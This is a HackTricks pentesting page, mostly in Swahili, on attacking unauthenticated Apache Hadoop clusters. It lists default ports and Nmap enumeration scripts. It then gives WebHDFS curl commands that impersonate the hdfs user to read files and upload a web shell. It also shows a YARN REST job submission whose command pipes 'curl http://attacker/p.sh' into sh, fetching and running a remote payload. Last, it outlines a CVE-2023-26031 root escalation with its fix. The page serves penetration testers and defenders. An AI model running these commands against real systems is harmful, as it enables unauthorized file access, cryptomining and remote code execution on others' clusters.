50030-50060-50070-50075-50090 - Pentesting Hadoop

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Taarifa za Msingi

Apache Hadoop ni mfumo wa chanzo wazi kwa ajili ya uhifadhi uliogawanywa na usindikaji wa seti kubwa za data katika cluster za kompyuta. Inatumia HDFS kwa ajili ya uhifadhi na MapReduce kwa ajili ya usindikaji.

Bandari za chaguo-msingi zinazotumika:

  • 50070 / 9870 NameNode (WebHDFS)
  • 50075 / 9864 DataNode
  • 50090 Secondary NameNode
  • 8088 YARN ResourceManager web UI & REST
  • 8042 YARN NodeManager
  • 8031/8032 YARN RPC (mara nyingi husahaulika na bado bila uthibitisho katika usakinishaji mingi)

Kwa bahati mbaya, Hadoop haijaungwa mkono katika Metasploit framework wakati wa uandishi wa nyaraka. Hata hivyo, unaweza kutumia scripts za Nmap zifuatazo kuorodhesha huduma za Hadoop:

  • hadoop-jobtracker-info (Port 50030)
  • hadoop-tasktracker-info (Port 50060)
  • hadoop-namenode-info (Port 50070)
  • hadoop-datanode-info (Port 50075)
  • hadoop-secondary-namenode-info (Port 50090)

Ni muhimu kutambua kwamba Hadoop inafanya kazi bila uthibitisho katika usanidi wake wa chaguo-msingi. Hata hivyo, kwa usalama ulioboreshwa, kuna usanidi unaowezesha kuunganisha Kerberos na huduma za HDFS, YARN, na MapReduce.

WebHDFS / HttpFS matumizi mabaya (50070/9870 or 14000)

Wakati security=off unaweza kujifanya mtumiaji yeyote kwa kutumia parameter ya user.name. Baadhi ya mbinu za haraka:

# list root directory
curl "http://<host>:50070/webhdfs/v1/?op=LISTSTATUS&user.name=hdfs"

# read arbitrary file from HDFS
curl -L "http://<host>:50070/webhdfs/v1/etc/hadoop/core-site.xml?op=OPEN&user.name=hdfs"

# upload a web shell / binary
curl -X PUT -T ./payload "http://<host>:50070/webhdfs/v1/tmp/payload?op=CREATE&overwrite=true&user.name=hdfs" -H 'Content-Type: application/octet-stream'

If HttpFS is enabled (default port 14000) the same REST paths apply. Behind Kerberos you can still use curl --negotiate -u : with a valid ticket.

YARN unauth RCE (8088)

The ResourceManager REST API inakubali uwasilishaji wa kazi bila uthibitisho katika mode ya chaguo-msingi β€œsimple” (dr.who). Wavamizi wanaitumia kuendesha amri za hiari (mf. miners) bila kuhitaji ruhusa ya kuandika HDFS.

# 1) get an application id
curl -s -X POST http://<host>:8088/ws/v1/cluster/apps/new-application

# 2) submit DistributedShell pointing to a command
curl -s -X POST http://<host>:8088/ws/v1/cluster/apps \
-H 'Content-Type: application/json' \
-d '{
"application-id":"application_1234567890000_0001",
"application-name":"pwn",
"am-container-spec":{
"commands":{"command":"/bin/bash -c \"curl http://attacker/p.sh|sh\""}
},
"application-type":"YARN"
}'

Ikiwa bandari 8031/8032 RPC imefunuliwa, cluster za zamani zinaruhusu uwasilishaji wa kazi sawa kupitia protobuf bila auth (imeandikwa katika kampeni kadhaa za cryptominer) – chukulia bandari hizo kama RCE pia.

Local PrivEsc kutoka kwa YARN containers (CVE-2023-26031)

Hadoop 3.3.1–3.3.4 container-executor inapakia libs kutoka kwenye relative RUNPATH. Mtumiaji ambaye anaweza kuendesha YARN containers (ikiwa ni pamoja na remote submitters kwenye cluster zisizo salama) anaweza kuweka libcrypto.so yenye madhara katika njia inayoweza kuandikwa na kupata root wakati container-executor inapokimbia kwa SUID.

Quick check:

readelf -d /opt/hadoop/bin/container-executor | grep 'RUNPATH\|RPATH'
# vulnerable if it contains $ORIGIN/:../lib/native/
ls -l /opt/hadoop/bin/container-executor   # SUID+root makes it exploitable

Imerekebishwa katika 3.3.5; hakikisha binary sio SUID ikiwa makontena salama hazihitajiki.

Marejeo

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks